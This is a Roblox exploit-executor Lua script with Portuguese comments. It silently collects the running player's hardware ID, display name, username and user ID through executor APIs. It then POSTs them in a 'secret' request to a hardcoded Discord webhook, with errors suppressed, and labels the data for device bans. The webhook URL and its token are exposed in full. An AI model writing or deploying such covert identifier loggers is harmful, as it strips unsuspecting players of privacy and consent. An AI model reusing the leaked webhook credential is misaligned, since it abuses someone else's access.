-- [VERSÃO SEPARADA - APENAS WEBHOOK COM BYPASS PARA O GIT]
local Players = game:GetService("Players")
local L_Player = Players.LocalPlayer

local webhookURL = "https://discord.com/api/webhooks/1512877333688614942/xGtPbt9mfc8I0WR11dwsCMlaSdMPaKtOsdMjd8C9ME8cSvxrwcRPnDNUa3NRena_wufG?thread_id=1512876677326438601"

local hwid = "Unavailable"
pcall(function()
    if syn and syn.gethwid then
        hwid = syn.gethwid()
    elseif gethwid then
        hwid = gethwid()
    elseif fluxus and getgenv and getgenv().fluxus then
        hwid = tostring(getgenv().fluxus.HWID or "Unavailable")
    elseif delta and get_hw_id then
        hwid = tostring(get_hw_id())
    end
end)

local embedData = {
    ["embeds"] = {{
        ["title"] = "🛑 HWID LOG - BANNED PERSON HWID (for device ban)",
        ["color"] = 16711680,
        ["fields"] = {
            {
                ["name"] = "{ Username/Display Name }",
                ["value"] = string.format("Display Name: %s\nUsername: @%s\nID: %s", L_Player.DisplayName, L_Player.Name, tostring(L_Player.UserId)),
                ["inline"] = false
            },
            {
                ["name"] = "{ HWID }",
                ["value"] = string.format("`%s`", hwid),
                ["inline"] = false
            },
            {
                ["name"] = "{ Reason }",
                ["value"] = "Test",
                ["inline"] = false
            }
        },
        ["timestamp"] = os.date("!Y-%m-%dT%H:%M:%SZ")
    }}
}

-- Função de envio secreta do executor
local req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
if req then
    pcall(function()
        req({
            Url = webhookURL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = game:GetService("HttpService"):JSONEncode(embedData)
        })
    end)
end
